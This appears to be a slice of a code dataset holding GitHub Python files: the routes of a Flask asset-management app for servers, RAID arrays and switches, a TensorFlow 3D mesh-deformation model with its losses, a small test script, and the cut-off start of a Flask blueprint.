t[1].split('小时')\n t_3 = t[2].split('分钟')\n t2 = int(t_1[0]) * 24 + int(t_2[0]) + int(t_3[0]) % 60 + t2\n else:\n t_1 = t[0].split('小时')\n t_2 = t[1].split('分钟')\n t2 = int(t_1[0]) + int(t_2[0]) % 60 + t2\n t3 = 0\n raid_used = 0\n for raid in raid_on:\n t = raid.UPTIME.split(' ')\n if len(t) > 1:\n if len(t) > 6:\n t_1 = t[0].split('天')\n t_2 = t[1].split('小时')\n t_3 = t[2].split('分钟')\n t3 = int(t_1[0]) * 24 + int(t_2[0]) + int(t_3[0]) % 60 + t3\n else:\n t_1 = t[0].split('小时')\n t_2 = t[1].split('分钟')\n t3 = int(t_1[0]) + int(t_2[0]) % 60 + t3\n raid_used = float(raid.USEDPERCENT) + raid_used\n raid_used = raid_used*100/raid_on_count\n raid_used = round(raid_used, 2)\n return render_template('index.html', server_on_count=server_on_count, server_all_count=server_all_count,\n switch_on_count=switch_on_count,switch_all_count=switch_all_count,\n raid_on_count=raid_on_count, raid_all_count=raid_all_count, raid_used=raid_used,\n server_time=t1, switch_time=t2, raid_time=t3)\n\n\n@main.route('/manage', methods=['GET'])\ndef manage():\n return render_template('manage.html')\n\n\n@main.route('/raid', methods=['GET', 'POST'])\ndef raid():\n raidmodels = RaidModel.query.all()\n return render_template('raid.html', raidmodels=raidmodels)\n\n\n@main.route('/switch', methods=['GET', 'POST'])\ndef switch():\n switchmodels = SwitchModel.query.all()\n return render_template('switch.html', switchmodels=switchmodels)\n\n\n@main.route('/server', methods=['GET', 'POST'])\ndef server():\n servermodels = ServerModel.query.all()\n return render_template('server.html', servermodels=servermodels)\n\n\n@main.route('/server/add', methods=['GET', 'POST'])\ndef addServer():\n serverform = ServerForm()\n print('submit:')\n print(serverform.validate_on_submit())\n print(serverform)\n if serverform.validate_on_submit():\n if not re.match('[0-9]{2,3}', serverform.position4.data):\n main_logger.warning('%s 添加服务器失败:房间号格式不正确 %s', 'manager', serverform.ip.data)\n else:\n if ServerModel.query.filter_by(IP=serverform.ip.data).first():\n main_logger.warning('%s 添加服务器失败:IP地址冲突 %s', 'manager', serverform.ip.data)\n else:\n if serverform.assertnum.data and ServerModel.query.filter_by(AssertNum=serverform.assertnum.data).first():\n main_logger.warning('%s 添加服务器失败:资产编号冲突 %s', 'manager', serverform.ip.data)\n else:\n position = serverform.position1.data + '-' + serverform.position2.data + '-' + \\\n serverform.position3.data + '-' + serverform.position4.data\n a = get_r5300_info(serverform.ip.data, serverform.model.data,\n position, serverform.owner.data, serverform.assertnum.data)\n if not a:\n servermodel = ServerModel(MODEL=serverform.model.data, POSITION=position,\n OWNER=serverform.owner.data, AssertNum=serverform.assertnum.data,\n IP=serverform.ip.data, MAC='', STATUS='OFF', UPTIME='')\n db.session.add(servermodel)\n db.session.commit()\n main_logger.info('%s 添加服务器成功: %s', 'manager', serverform.ip.data)\n servermodels = ServerModel.query.all()\n return redirect(url_for('main.server', servermodels=servermodels))\n return render_template('addserver.html', form=serverform)\n\n\n@main.route('/server/modify', methods=['GET', 'POST'])\ndef modifyServer():\n serverid = request.args.get('id', '')\n servermodel = ServerModel.query.filter_by(ID=serverid).first()\n serverposition = servermodel.POSITION.split('-')\n serverform = ServerForm(model=servermodel.MODEL, ip=servermodel.IP,\n mac=servermodel.MAC, owner=servermodel.OWNER,\n status=servermodel.STATUS, uptime=servermodel.UPTIME,\n assertnum=servermodel.AssertNum, position1=serverposition[0],\n position2=serverposition[1], position3=serverposition[2], position4=serverposition[3])\n if serverform.validate_on_submit():\n flash('已提交')\n if not re.match('[0-9]{2,3}', serverform.position4.data):\n flash('房间号格式不正确')\n else:\n # if not re.match('([A-Fa-f0-9]{2}:){5}[A-Fa-f0-9]{2}', serverform.mac.data):\n # flash('MAC地址格式不正确')\n # else:\n if serverform.ip.data != servermodel.IP and ServerModel.query.filter_by(IP=serverform.ip.data).first():\n flash('IP地址冲突')\n else:\n if serverform.mac.data != servermodel.MAC and ServerModel.query.filter_by(MAC=serverform.mac.data).first():\n flash('MAC地址冲突')\n else:\n if serverform.assertnum.data != servermodel.AssertNum and \\\n ServerModel.query.filter_by(AssertNum=serverform.assertnum.data).first():\n flash('资产编号冲突')\n else:\n serverposition = serverform.position1.data + '-' + serverform.position2.data + '-' + \\\n serverform.position3.data + '-' + serverform.position4.data\n servermodel.MODEL = serverform.model.data\n servermodel.IP = serverform.ip.data\n servermodel.POSITION = serverposition\n servermodel.MAC = serverform.mac.data\n servermodel.OWNER = serverform.owner.data\n servermodel.STATUS = serverform.status.data\n servermodel.UPTIME = serverform.uptime.data\n servermodel.AssertNum = serverform.assertnum.data\n db.session.commit()\n main_logger.info('%s 修改服务器成功: %s', 'manager', serverform.ip.data)\n servermodels = ServerModel.query.all()\n return redirect(url_for('main.server', servermodels=servermodels))\n return render_template('modifyserver.html', form=serverform)\n\n\n@main.route('/server/deleteserver', methods=['GET', 'POST'])\ndef deleteServer():\n serverid = request.args.get('id', '')\n servermodel = ServerModel.query.filter_by(ID=serverid).first()\n ip = servermodel.IP\n db.session.delete(servermodel)\n db.session.commit()\n main_logger.info('%s 删除服务器成功: %s', 'manager', ip)\n servermodels = ServerModel.query.all()\n return render_template('server.html', servermodels=servermodels)\n\n\n@main.route('/raid/add', methods=['GET', 'POST'])\ndef addRaid():\n raidform = RaidForm()\n print(\"submit\")\n print(raidform.validate_on_submit())\n print(raidform.data)\n if raidform.validate_on_submit():\n flash('已提交')\n if not re.match('[0-9]{2,3}', raidform.position4.data):\n flash('房间号格式不正确')\n else:\n if RaidModel.query.filter_by(IP=raidform.ip.data).first():\n flash('IP地址冲突')\n else:\n if raidform.assertnum.data and RaidModel.query.filter_by(AssertNum=raidform.assertnum.data).first():\n flash('资产编号冲突')\n else:\n position = raidform.position1.data + '-' + raidform.position2.data + '-' + \\\n raidform.position3.data + '-' + raidform.position4.data\n print('not a')\n a = get_ks3200_info(raidform.ip.data, position, raidform.owner.data, raidform.model.data, raidform.assertnum.data)\n print('a')\n print(a)\n if not a:\n raidmodel = RaidModel(MODEL=raidform.model.data, POSITION=position,\n OWNER=raidform.owner.data, AssertNum=raidform.assertnum.data,\n IP=raidform.ip.data, UPTIME='', STATUS='OFF', USEDPERCENT='')\n db.session.add(raidmodel)\n db.session.commit()\n main_logger.info('%s 添加磁阵成功: %s', 'manager', raidform.ip.data)\n raidmodels = ServerModel.query.all()\n return redirect(url_for('main.raid', raidmodels=raidmodels))\n return render_template('addraid.html', form=raidform)\n\n\n@main.route('/raid/modify', methods=['GET', 'POST'])\ndef modifyRaid():\n raidid = request.args.get('id', '')\n raidmodel = RaidModel.query.filter_by(ID=raidid).first()\n position = raidmodel.POSITION.split('-')\n form = RaidForm(model=raidmodel.MODEL, ip=raidmodel.IP,\n uptime=raidmodel.UPTIME, owner=raidmodel.OWNER,\n status=raidmodel.STATUS, usedpercent=raidmodel.USEDPERCENT,\n assertnum=raidmodel.AssertNum, position1=position[0],\n position2=position[1], position3=position[2], position4=position[3])\n if form.validate_on_submit():\n flash('已提交')\n if not re.match('[0-9]{2,3}', form.position4.data):\n flash('房间号格式不正确')\n else:\n if form.ip.data != raidmodel.IP and ServerModel.query.filter_by(IP=form.ip.data).first():\n flash('IP地址冲突')\n else:\n if form.assertnum.data != raidmodel.AssertNum and \\\n ServerModel.query.filter_by(AssertNum=form.assertnum.data).first():\n flash('资产编号冲突')\n else:\n serverposition = form.position1.data + '-' + form.position2.data + '-' + \\\n form.position3.data + '-' + form.position4.data\n raidmodel.MODEL = form.model.data\n raidmodel.IP = form.ip.data\n raidmodel.POSITION = serverposition\n raidmodel.UPTIME = form.uptime.data\n raidmodel.OWNER = form.owner.data\n raidmodel.STATUS = form.status.data\n raidmodel.USEDPERCENT = form.usedpercent.data\n raidmodel.AssertNum = form.assertnum.data\n db.session.commit()\n main_logger.info('%s 修改磁阵成功: %s', 'manager', form.ip.data)\n raidmodels = RaidModel.query.all()\n return redirect(url_for('main.raid', raidmodels=raidmodels))\n return render_template('modifyraid.html', form=form)\n\n\n@main.route('/server/deleteraid', methods=['GET', 'POST'])\ndef deleteRaid():\n raidid = request.args.get('id', '')\n raidmodel = RaidModel.query.filter_by(ID=raidid).first()\n ip = raidmodel.IP\n db.session.delete(raidmodel)\n db.session.commit()\n main_logger.info('%s 删除磁阵成功: %s', 'manager', ip)\n raidmodels = RaidModel.query.all()\n return render_template('raid.html', raidmodels=raidmodels)\n\n\n@main.route('/switch/add', methods=['GET', 'POST'])\ndef addSwitch():\n switchform = SwitchForm()\n print(\"submit\")\n print(switchform.validate_on_submit())\n print(switchform)\n if switchform.validate_on_submit():\n flash('已提交')\n if not re.match('[0-9]{2,3}', switchform.position4.data):\n flash('房间号格式不正确')\n else:\n if SwitchModel.query.filter_by(IP=switchform.ip.data).first():\n flash('IP地址冲突')\n else:\n if switchform.assertnum.data and SwitchModel.query.filter_by(AssertNum=switchform.assertnum.data).first():\n flash('资产编号冲突')\n else:\n position = switchform.position1.data + '-' + switchform.position2.data + '-' + \\\n switchform.position3.data + '-' + switchform.position4.data\n print('not a')\n a = get_switch_info(switchform.ip.data, position, switchform.owner.data, switchform.model.data, switchform.assertnum.data)\n print('a')\n print(a)\n if not a:\n switchmodel = SwitchModel(MODEL=switchform.model.data, POSITION=position,\n OWNER=switchform.owner.data, AssertNum=switchform.assertnum.data,\n IP=switchform.ip.data, UPTIME='', STATUS='OFF', IFNUMBER='')\n db.session.add(switchmodel)\n db.session.commit()\n main_logger.info('%s 添加交换机成功: %s', 'manager', switchform.ip.data)\n switchmodels = SwitchModel.query.all()\n return redirect(url_for('main.switch', switichmodels=switchmodels))\n return render_template('addswitch.html', form=switchform)\n\n\n@main.route('/switch/modify', methods=['GET', 'POST'])\ndef modifySwitch():\n switchid = request.args.get('id', '')\n switchmodel = SwitchModel.query.filter_by(ID=switchid).first()\n position = switchmodel.POSITION.split('-')\n form = SwitchForm(model=switchmodel.MODEL, ip=switchmodel.IP,\n uptime=switchmodel.UPTIME, owner=switchmodel.OWNER,\n status=switchmodel.STATUS, ifnumber=switchmodel.IFNUMBER,\n assertnum=switchmodel.AssertNum, position1=position[0],\n position2=position[1], position3=position[2], position4=position[3])\n if form.validate_on_submit():\n flash('已提交')\n if not re.match('[0-9]{2,3}', form.position4.data):\n flash('房间号格式不正确')\n else:\n if form.ip.data != switchmodel.IP and ServerModel.query.filter_by(IP=form.ip.data).first():\n flash('IP地址冲突')\n else:\n if form.assertnum.data != switchmodel.AssertNum and \\\n ServerModel.query.filter_by(AssertNum=form.assertnum.data).first():\n flash('资产编号冲突')\n else:\n serverposition = form.position1.data + '-' + form.position2.data + '-' + \\\n form.position3.data + '-' + form.position4.data\n switchmodel.MODEL = form.model.data\n switchmodel.IP = form.ip.data\n switchmodel.POSITION = serverposition\n switchmodel.UPTIME = form.uptime.data\n switchmodel.OWNER = form.owner.data\n switchmodel.STATUS = form.status.data\n switchmodel.IFNUMBER = form.ifnumber.data\n switchmodel.AssertNum = form.assertnum.data\n db.session.commit()\n main_logger.info('%s 修改交换机成功: %s', 'manager', form.ip.data)\n switchmodels = SwitchModel.query.all()\n return redirect(url_for('main.switch', switchmodels=switchmodels))\n return render_template('modifyswitch.html', form=form)\n\n\n@main.route('/switch/deleteswitch', methods=['GET', 'POST'])\ndef deleteSwitch():\n switchid = request.args.get('id', '')\n switchmodel = SwitchModel.query.filter_by(ID=switchid).first()\n ip = switchmodel.IP\n db.session.delete(switchmodel)\n db.session.commit()\n main_logger.info('%s 删除交换机成功: %s', 'manager', ip)\n switchmodels = SwitchModel.query.all()\n return render_template('switch.html', switchmodels=switchmodels)\n\n@main.route('/server/batchadd', methods=['GET', 'POST'])\ndef batchadd():\n return render_template('server1.html')\n \ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in set(['xlsx'])\n\n@main.route('/server/upload', methods=['GET', 'POST'])\ndef upload():\n #print(\"de\")\n #print(\"de\")\n print(request.files)\n file = request.files.get('file')\n print(file)\n #print(\"de1\")\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n #print(\"de2\")\n print(filename)\n file_path = '/opt/'\n file.save(os.path.join(file_path, filename))\n #print(\"de3\")\n work_file = file_path + filename\n print(work_file)\n ExcelFile = xlrd.open_workbook(work_file)\n print(\"start batch insert\\n\") \n table = ExcelFile.sheets()[0]\n \n #get rows number\n nrows = table.nrows \n #print(nrows) \n #get cols number\n ncols = table.ncols \n data_list = []\n \n #start row from index 2, first row is the title\n for col in range(ncols):\n row_values = table.col_values(col, 1, nrows)\n data_list.append(row_values)\n print(data_list)\n try:\n for row in range(nrows-1):\n print(\"aaa\")\n servermodel = ServerModel(MODEL=data_list[0][row], POSITION=data_list[2][row],\n OWNER=data_list[5][row], AssertNum=data_list[1][row],\n IP=data_list[4][row], MAC=data_list[3][row],\n STATUS=data_list[6][row], UPTIME=data_list[7][row])\n print(\" WWJ\")\n db.session.add(servermodel)\n db.session.commit()\n print(\"\\ninsert sucessful\\n\")\n except Exception: \n print(\"DB insert Exception\")\n print(Exception)\n else:\n print(\"qingshuru1\")\n #tkinter.messagebox.showerror(\"提示\",\"请选择excel文件\")\n print(\"aaa\")\n servermodels = ServerModel.query.all()\n return redirect(url_for('main.server', servermodels=servermodels))\n #pass\n # pass\n\n\n@main.route('/server/download', methods=['GET', 'POST'])\ndef Serverdownload():\n file_export_path = \"\"\n workbook = xlwt.Workbook(encoding = \"UTF-8\")\n servermodels_list = ServerModel.query.all()\n read_data_list = servermodels_list\n #print(\"de\")\n for i in read_data_list:\n print(\"de\"+i.MAC+\"de\")\n sheet = workbook.add_sheet('Asset Server information table')\n #insert the db_head to the generated excel\n head_list = [u\"型号\",u\"资产编号\",u\"位置\",\\\n u\"MAC\",u\"IP\",u\"持有人\", u\"上电状态\",u\"上电时间\"]\n col_head_insert_index = 0\n print(\"de1\")\n for element in head_list:\n print(\"de2\")\n sheet.write(0, col_head_insert_index, element)\n col_head_insert_index += 1\n #insert DB_data to generated excel\n row_insert_index = 1\n col_insert_index = 0\n for list in read_data_list:\n list_temp = [list.MODEL, list.AssertNum,\\\n list.POSITION, list.MAC, list.IP,\\\n list.OWNER, list.STATUS, list.UPTIME]\n print(list_temp)\n for element in list_temp:\n #print(\"de22\")\n #print(\"a\"+element+\"b\") \n sheet.write(row_insert_index, col_insert_index, element)\n col_insert_index += 1\n row_insert_index += 1\n col_insert_index = 0\n #list_temp = [] \n #print(row_insert_index)\n #print(\"de33\")\n workbook.save(file_export_path.join([\"Asset_server_information\", \".xlsx\"]))\n print(\"export sucessful\")\n filename = \"Asset_server_information.xlsx\"\n directory = \"/home/RMS_11/Asset_Management-code/cmdb-zte-1/\"\n response = send_from_directory(directory, filename, as_attachment=True)\n return response\n #pass\n@main.route('/raid/download', methods=['GET', 'POST'])\ndef Raiddownload():\n file_export_path = \"\"\n workbook = xlwt.Workbook(encoding = \"UTF-8\")\n servermodels_list = RaidModel.query.all()\n read_data_list = servermodels_list\n #print(\"de\")\n sheet = workbook.add_sheet('Asset Raid information table')\n #insert the db_head to the generated excel\n head_list = [u\"型号\",u\"位置\",u\"持有人\",\\\n u\"资产编号\",u\"IP\",\"上电时间\", u\"上电状态\",u\"使用率\"]\n col_head_insert_index = 0\n print(read_data_list[0].MODEL)\n print(read_data_list[0].POSITION)\n print(read_data_list[0].AssertNum)\n print(read_data_list[0].IP)\n print(read_data_list[0].STATUS)\n print(read_data_list[0].USEDPERCENT)\n print(read_data_list[0].OWNER)\n print(read_data_list[0].UPTIME)\n for element in head_list:\n print(\"de2\")\n sheet.write(0, col_head_insert_index, element)\n col_head_insert_index += 1\n #insert DB_data to generated excel\n row_insert_index = 1\n col_insert_index = 0\n for list in read_data_list:\n print(\"de3\")\n list_temp = [list.MODEL, list.POSITION,\\\n list.OWNER, list.AssertNum, list.IP,\\\n list.UPTIME, list.STATUS, list.USEDPERCENT]\n print(list_temp)\n for element in list_temp:\n #print(\"de22\")\n #print(\"a\"+element+\"b\") \n sheet.write(row_insert_index, col_insert_index, element)\n col_insert_index += 1\n row_insert_index += 1\n col_insert_index = 0\n #list_temp = [] \n #print(row_insert_index)\n #print(\"de33\")\n workbook.save(file_export_path.join([\"Asset_raid_information\", \".xlsx\"]))\n print(\"export sucessful\")\n filename = \"Asset_raid_information.xlsx\"\n directory = \"/home/RMS_11/Asset_Management-code/cmdb-zte-1/\"\n response = send_from_directory(directory, filename, as_attachment=True)\n return response\n #pass\n\n@main.route('/switch/download', methods=['GET', 'POST'])\ndef Switchdownload():\n file_export_path = \"\"\n workbook = xlwt.Workbook(encoding = \"UTF-8\")\n servermodels_list = SwitchModel.query.all()\n read_data_list = servermodels_list\n #print(\"de\")\n sheet = workbook.add_sheet('Asset Switch information table')\n #insert the db_head to the generated excel\n head_list = [u\"型号\",u\"位置\",u\"持有人\",\\\n u\"资产编号\",u\"IP\",u\"上电时间\", u\"上电状态\",u\"网络接口数量\"]\n col_head_insert_index = 0\n print(read_data_list)\n for element in head_list:\n print(\"de2\")\n sheet.write(0, col_head_insert_index, element)\n col_head_insert_index += 1\n #insert DB_data to generated excel\n row_insert_index = 1\n col_insert_index = 0\n for list in read_data_list:\n list_temp = [list.MODEL, list.POSITION,\\\n list.OWNER, list.AssertNum, list.IP,\\\n list.UPTIME, list.STATUS, list.IFNUMBER]\n print(list_temp)\n for element in list_temp:\n #print(\"de22\")\n #print(\"a\"+element+\"b\") \n sheet.write(row_insert_index, col_insert_index, element)\n col_insert_index += 1\n row_insert_index += 1\n col_insert_index = 0\n #list_temp = [] \n #print(row_insert_index)\n #print(\"de33\")\n workbook.save(file_export_path.join([\"Asset_switch_information\", \".xlsx\"]))\n print(\"export sucessful\")\n filename = \"Asset_switch_information.xlsx\"\n directory = \"/home/RMS_11/Asset_Management-code/cmdb-zte-1/\"\n response = send_from_directory(directory, filename, as_attachment=True)\n return response\n #pass\n\n\n@main.route('/update', methods=['GET', 'POST'])\ndef update():\n update_server_DB()\n update_storage_DB()\n update_switch_DB()\n servermodels = ServerModel.query.all()\n return redirect(url_for('main.server', servermodels=servermodels))\n\n","repo_name":"wanweijian/RMS_12","sub_path":"RMS-System/Asset_Management-code/cmdb-zte-1/app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":25958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6992575464","text":"import tensorflow as tf\nimport numpy as np\nimport math\nimport os\nfrom tensorflow.contrib.slim.python.slim.nets import vgg\nfrom tensorflow.contrib import layers\nimport sys\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = os.path.dirname(BASE_DIR)\nsys.path.append(os.path.join(ROOT_DIR))\nsys.path.append(os.path.join(ROOT_DIR, 'models'))\nimport models.pointnet.model as pointnet\nimport losses\nimport meshnet\nimport deformnet\n\ndef mesh_placeholder_inputs(batch_size, maxnverts, maxntris, img_size=(600,600), scope=''):\n\n with tf.variable_scope(scope) as sc:\n verts_pl = tf.placeholder(tf.float32, shape=(batch_size, maxnverts, 3))\n nverts_pl = tf.placeholder(tf.int32, shape=(batch_size, 1))\n tris_pl = tf.placeholder(tf.int32, shape=(batch_size, maxntris, 3))\n ntris_pl = tf.placeholder(tf.int32, shape=(batch_size, 1))\n imgs_pl = tf.placeholder(tf.float32, shape=(batch_size, img_size[0], img_size[1], 3))\n\n mesh = {}\n mesh['verts'] = verts_pl\n mesh['nverts'] = nverts_pl\n mesh['tris'] = tris_pl\n mesh['ntris'] = ntris_pl\n mesh['imgs'] = imgs_pl\n\n return mesh\n\ndef get_model(src_mesh, ref_mesh, num_point, is_training, bn=False, bn_decay=None, img_size = 224, localloss=True):\n\n src_verts = src_mesh['verts']\n src_nverts = src_mesh['nverts']\n src_tris = src_mesh['tris']\n src_ntris = src_mesh['ntris']\n\n ref_verts = ref_mesh['verts']\n ref_nverts = ref_mesh['nverts']\n ref_tris = ref_mesh['tris']\n ref_ntris = ref_mesh['ntris']\n ref_img = ref_mesh['imgs']\n\n batch_size = src_verts.get_shape()[0].value\n num_src_verts = src_verts.get_shape()[1].value\n\n end_points = {}\n end_points['src_mesh'] = src_mesh\n end_points['ref_mesh'] = ref_mesh\n\n # source\n src_pc, _, correpondingface,_,_,_ = meshnet.mesh_sample(src_verts, src_nverts, src_tris, src_ntris, batch_size, num_point, src_verts, scope='meshsample') \n end_points['src_pc'] = src_pc\n _, src_feats = pointnet.get_model(src_pc, is_training, num_point=num_point, scope='srcpc', bn=bn, bn_decay=bn_decay)\n end_points['src_feats'] = src_feats['embedding']\n\n ref_pc, _, correpondingface,_,_,_ = meshnet.mesh_sample(ref_verts, ref_nverts, ref_tris, ref_ntris, batch_size, num_point, ref_verts, scope='meshsample') \n end_points['ref_pc'] = ref_pc\n\n # CNN extract features\n if ref_img.shape[1] != img_size or ref_img.shape[2] != img_size:\n ref_img = tf.image.resize_bilinear(ref_img, [img_size, img_size])\n end_points['ref_img'] = ref_img\n\n vgg.vgg_16.default_image_size = img_size\n ref_feats_embedding, vgg_end_points = vgg.vgg_16(ref_img, num_classes=1024, is_training=False, scope='vgg_16', spatial_squeeze=False)\n\n ref_feats_embedding_cnn = tf.squeeze(ref_feats_embedding, axis = [1,2]) \n end_points['ref_feats_embedding_cnn'] = ref_feats_embedding_cnn\n\n with tf.variable_scope(\"refpc_reconstruction\") as scope: \n reconst_pc = pointnet.get_decoder(ref_feats_embedding_cnn, is_training)\n end_points['reconst_pc'] = reconst_pc\n\n with tf.variable_scope(\"sharebiasnet\") as scope: \n pred_pc, centroids = deformnet.get_pred_foldenet_basic(src_pc, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n end_points['pred_pc'] = pred_pc\n\n scope.reuse_variables() \n pred_verts, _ = deformnet.get_pred_foldenet_basic(src_verts, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay) \n end_points['pred_verts'] = pred_verts\n\n if localloss:\n delta = 0.005\n localpclap_pred_pc = [pred_pc]\n localpclap_src_pc = [src_pc]\n\n src_pc_x = src_pc[:,:,0]\n src_pc_y = src_pc[:,:,1]\n src_pc_z = src_pc[:,:,2]\n\n src_pc_x1 = src_pc_x + delta\n src_pc_x1 = tf.concat(axis=2, values=[tf.expand_dims(src_pc_x1, -1), src_pc[:,:,1:]])\n src_pc_x2 = src_pc_x - delta\n src_pc_x2 = tf.concat(axis=2, values=[tf.expand_dims(src_pc_x2, -1), src_pc[:,:,1:]])\n\n src_pc_y1 = src_pc_y + delta\n src_pc_y1 = tf.concat(axis=2, values=[tf.expand_dims(src_pc[:,:,0], -1), tf.expand_dims(src_pc_y1, -1), tf.expand_dims(src_pc[:,:,2], -1)])\n src_pc_y2 = src_pc_y - delta\n src_pc_y2 = tf.concat(axis=2, values=[tf.expand_dims(src_pc[:,:,0], -1), tf.expand_dims(src_pc_y2, -1), tf.expand_dims(src_pc[:,:,2], -1)])\n\n src_pc_z1 = src_pc_z + delta\n src_pc_z1 = tf.concat(axis=2, values=[src_pc[:,:,:2], tf.expand_dims(src_pc_z1, -1)])\n src_pc_z2 = src_pc_z - delta\n src_pc_z2 = tf.concat(axis=2, values=[src_pc[:,:,:2], tf.expand_dims(src_pc_z2, -1)])\n\n localpclap_src_pc += [[src_pc_x1, src_pc_x2],\n [src_pc_y1, src_pc_y2], \n [src_pc_z1, src_pc_z2]] \n end_points['localpclap_src_pc'] = localpclap_src_pc \n\n pred_pc_x1, _ = deformnet.get_pred_foldenet_basic(src_pc_x1, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n pred_pc_x2, _ = deformnet.get_pred_foldenet_basic(src_pc_x2, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n\n pred_pc_y1, _ = deformnet.get_pred_foldenet_basic(src_pc_y1, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n pred_pc_y2, _ = deformnet.get_pred_foldenet_basic(src_pc_y2, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n\n pred_pc_z1, _ = deformnet.get_pred_foldenet_basic(src_pc_z1, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n pred_pc_z2, _ = deformnet.get_pred_foldenet_basic(src_pc_z2, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n\n localpclap_pred_pc += [[pred_pc_x1, pred_pc_x2],\n [pred_pc_y1, pred_pc_y2], \n [pred_pc_z1, pred_pc_z2]]\n end_points['localpclap_pred_pc'] = localpclap_pred_pc\n\n return end_points\n\n\n\ndef get_loss(end_points, num_class=4):\n \"\"\"\n pred: BxNx3,\n label: BxNx3,\n \"\"\"\n\n end_points['losses'] = {}\n pred_pc = end_points['pred_pc']\n ref_pc = end_points['ref_pc']\n\n ## point cloud loss\n pred_pc = end_points['pred_pc']\n ref_pc = end_points['ref_pc']\n pc_cf_loss, end_points = losses.get_chamfer_loss(pred_pc, ref_pc, end_points)\n pc_cf_loss = 10000 * pc_cf_loss\n \n pc_em_loss, end_points = losses.get_em_loss(pred_pc, ref_pc, end_points)\n end_points['losses']['pc_cf_loss'] = pc_cf_loss\n end_points['losses']['pc_em_loss'] = pc_em_loss\n\n ## mesh loss\n pred_verts = end_points['pred_verts']\n src_mesh = end_points['src_mesh']\n src_verts = src_mesh['verts']\n src_nverts = src_mesh['nverts']\n src_tris = src_mesh['tris']\n src_ntris = src_mesh['ntris']\n batch_size = src_verts.get_shape()[0].value\n num_point = ref_pc.get_shape()[1].value\n _, pred_pc_fromverts, correpondingface, _, _, _ = meshnet.mesh_sample(src_verts, src_nverts, src_tris, src_ntris, batch_size, num_point, src_verts, scope='meshsample') \n pred_pc_fromverts = tf.squeeze(pred_pc_fromverts, axis=2)\n mesh_cf_loss, end_points = losses.get_chamfer_loss(pred_pc_fromverts, ref_pc, end_points)\n mesh_cf_loss = 1000 * mesh_cf_loss\n \n mesh_em_loss, end_points = losses.get_em_loss(pred_pc_fromverts, ref_pc, end_points)\n end_points['losses']['mesh_cf_loss'] = mesh_cf_loss\n end_points['losses']['mesh_em_loss'] = mesh_em_loss\n\n ## symmetry loss\n pred_pc_xflip = tf.concat([tf.expand_dims(-pred_pc[:,:,0], axis=2), tf.expand_dims(pred_pc[:,:,1], axis=2), tf.expand_dims(pred_pc[:,:,2], axis=2)], axis = 2)\n pc_symmetry_loss, end_points = losses.get_chamfer_loss(pred_pc_xflip, ref_pc, end_points)\n pc_symmetry_loss = 1000 * pc_symmetry_loss\n match_symmetry_loss, end_points = losses.get_em_loss(pred_pc_xflip, ref_pc, end_points)\n end_points['losses']['pc_symmetry_loss'] = pc_symmetry_loss\n end_points['losses']['match_symmetry_loss'] = match_symmetry_loss\n\n # local permutation invariance loss\n localpclap_pred_pc = end_points['localpclap_pred_pc']\n pc_local_laplacian_loss, end_points = losses.get_pc_local_laplacian_loss(localpclap_pred_pc, end_points=end_points)\n pc_local_laplacian_loss = 1000 * pc_local_laplacian_loss\n end_points['losses']['pc_local_laplacian_loss'] = pc_local_laplacian_loss\n\n ## mesh laplacian loss\n mesh_laplacian_loss, _ = losses.get_laplacian_loss(src_mesh, pred_verts)\n mesh_laplacian_loss = 0.01 * mesh_laplacian_loss\n end_points['losses']['mesh_laplacian_loss'] = mesh_laplacian_loss\n\n # reconstruction loss\n reconst_pc = end_points['reconst_pc']\n recon_cf_loss, end_points = losses.get_chamfer_loss(reconst_pc, ref_pc, end_points)\n recon_cf_loss = 1000 * recon_cf_loss\n recon_em_loss, end_points = losses.get_em_loss(reconst_pc, ref_pc, end_points)\n end_points['losses']['recon_cf_loss'] = recon_cf_loss\n end_points['losses']['recon_em_loss'] = recon_em_loss\n\n loss = pc_cf_loss + pc_em_loss + \\\n mesh_cf_loss + mesh_em_loss + \\\n pc_symmetry_loss + match_symmetry_loss + \\\n recon_cf_loss + recon_em_loss + \\\n pc_local_laplacian_loss + \\\n mesh_laplacian_loss \n\n end_points['losses']['overall_loss'] = loss\n tf.add_to_collection('losses', loss)\n\n for lossname in end_points['losses'].keys():\n tf.summary.scalar(lossname, end_points['losses'][lossname])\n\n return loss, end_points\n","repo_name":"laughtervv/3DN","sub_path":"shapenet/2D/model_vgg.py","file_name":"model_vgg.py","file_ext":"py","file_size_in_byte":9851,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"48"} +{"seq_id":"70945396945","text":"import sys, os\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\nfrom file import File\n\nf = File(\"content.fx\")\nf.expressions = {\n \"5\": [(0,0),(1,0), (2,0)],\n \"4\": [(3,0),(4,0), (3,1),(4,1)]\n}\nprint([[\"Range \" + str((l.rows, l.cols)) for l in items] for items in f.compact().values()])","repo_name":"jhoobergs/FRuTeX","sub_path":"fx-backend/src/tests/file_test.py","file_name":"file_test.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13861858993","text":"from flask import *\nimport codecs,json,sys,os\nfrom Named import name\nfrom Named import get_name\nfrom flask_cors import CORS\n\nnamed = Blueprint('named', __name__)\ncors = CORS(named, resources={r\"/named/sentdata\": {\"origins\": \"*\"}})\ncors = CORS(named, resources={r\"/named/getdata\": {\"origins\": \"*\"}})\n\n@named.route('/sentdata',methods=['GET','POST']) ##从前端得到数据\ndef sentdata():\n data = request.get_data()\n json_re = json.loads(data)\n print(json_re[\"text\"])\n name.whole(json_re[\"text\"])\n return 